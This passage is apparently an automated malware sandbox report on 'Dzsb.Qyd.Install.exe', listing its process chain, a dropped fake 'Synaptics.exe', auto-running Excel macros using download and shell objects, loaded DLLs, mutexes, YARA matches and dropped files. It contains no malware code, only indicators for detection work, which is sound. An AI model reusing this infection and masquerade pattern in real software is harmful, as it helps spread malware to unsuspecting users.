                              Source: VO87wxAM.xlsm.20.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: EIVQSAOTAQ.xlsm.20.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: I9FyyXRL.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: VO87wxAM.xlsm.20.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: EIVQSAOTAQ.xlsm.20.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: I9FyyXRL.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: VO87wxAM.xlsm.20.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: EIVQSAOTAQ.xlsm.20.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: I9FyyXRL.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: VO87wxAM.xlsm.20.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: EIVQSAOTAQ.xlsm.20.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 2896
                              Source: Dzsb.Qyd.Install.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Dzsb.Qyd.Install.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCXE0B2.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Dzsb.Qyd.Install.exe
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252386493.0000000000615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Dzsb.Qyd.Install.exe
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000000.1244675320.00000000004E1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs Dzsb.Qyd.Install.exe
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Dzsb.Qyd.Install.exe
                              Source: Dzsb.Qyd.Install.exeBinary or memory string: OriginalFileName vs Dzsb.Qyd.Install.exe
                              Source: Dzsb.Qyd.Install.exeBinary or memory string: OriginalFilenameb! vs Dzsb.Qyd.Install.exe
                              Source: Dzsb.Qyd.Install.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.winEXE@13/54@12/5
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile created: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6056
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3588
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\I9FyyXRL.xlsmJump to behavior
                              Source: Yara matchFile source: Dzsb.Qyd.Install.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.Dzsb.Qyd.Install.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE0B2.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile read: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Dzsb.Qyd.Install.exe "C:\Users\user\Desktop\Dzsb.Qyd.Install.exe"
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess created: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe "C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe"
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3588 -s 2896
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 6328
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess created: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe "C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\4Un6axl.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: Binary string: d:\CSharp\Dzsb.Qyd\Dzsb.Qyd.Install\Debug\Dzsb.Qyd.Install.pdb source: Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.dr
                              Source: ._cache_Dzsb.Qyd.Install.exe.0.drStatic PE information: section name: .textbss

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile created: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
